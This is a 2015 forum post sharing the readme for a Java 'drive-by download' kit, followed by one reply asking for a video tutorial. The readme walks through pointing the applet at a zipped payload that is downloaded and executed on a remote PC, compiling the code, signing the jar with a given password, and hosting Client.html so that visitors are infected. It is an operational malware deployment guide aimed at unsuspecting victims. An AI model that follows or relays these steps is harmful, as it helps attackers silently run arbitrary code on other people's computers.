Active Members Fi8sVrs Posted May 1, 2015 Active Members Report Posted May 1, 2015 Readme:Step 1.) Open game.java and change fileLink to a link to a ZIPPED file that you want to download and execute to the remote pc..Step 2.) whilst still in game.java change fileDir to the directory of the computer where you want to download your application to.Step 3.) Find out what JDK version you have and edit the three .bat files to correspond to your JDK version - Example:"C:\Program Files\Java\jdk1.6.0_16\bin\javac.exe" -cp . *.javaThis shows my version of JDK is 1.6.0_16 if you go to 'C:\Program Files\Java\' and see what version of jdk you had e.g. 1.6.0_21 you would change the three files so that itwas like so:"C:\Program Files\Java\jdk1.6.0_21\bin\javac.exe"Step 4.) Run Compile.bat if no errors show then proceed to step 5.Step 5.) Run Make JAR-FILE.batStep 6.) Run 'SIGN YOUR JAR.bat' and when prompted enter the password 'java123' it will not show your typing but it will be there after typing 'java123' hit enter.Step 7.) Upload yourfile.zip, Client.html, and Client.jar to a webhost, and then send people to http://yourlink.com/Client.html to execute the Drive By Download on them.Download Quote
dangerkarkuki Posted May 3, 2015 Report Posted May 3, 2015 I want to know how to use JavaDBD a video? Quote